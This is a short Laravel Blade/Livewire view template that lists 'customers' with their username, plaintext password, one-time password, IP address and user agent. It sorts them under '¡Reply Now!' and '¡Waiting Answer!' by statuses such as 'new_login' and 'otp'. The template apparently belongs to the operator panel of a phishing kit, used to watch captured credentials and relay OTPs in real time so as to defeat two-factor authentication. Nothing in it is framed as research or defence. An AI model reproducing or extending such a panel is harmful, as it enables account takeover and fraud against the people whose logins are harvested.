@livewireStyles

¡Reply Now!

@foreach ($customers as $customer) @if ($customer->status == 'new_otp' || $customer->status == 'new_login')
{{-- Information basic --}}
ID
{{ $customer->id_unique }}
Status
{{ $customer->status }}
{{-- Buttons --}}
{{-- info --}}

Last Activity:
{{ $customer->updated_at }}


User: {{ $customer->user }}

Password: {{ $customer->password }}

OTP: {{ $customer->otp }}


IP: {{ $customer->ip }}

User Agent: {{ $customer->user_agent }}

{{-- Buttons info --}}
@csrf
@endif @endforeach

¡Waiting Answer!

@foreach ($customers as $customer) @if ($customer->status == 'otp' || $customer->status == 'login_try')
{{-- Information basic --}}
ID
{{ $customer->id_unique }}
Status
{{ $customer->status }}
{{-- Buttons --}}
{{-- info --}}

Last Activity:
{{ $customer->updated_at }}


User: {{ $customer->user }}

Password: {{ $customer->password }}

OTP: {{ $customer->otp }}


IP: {{ $customer->ip }}

User Agent: {{ $customer->user_agent }}

{{-- Buttons info --}}
@csrf
@endif @endforeach
@livewireScripts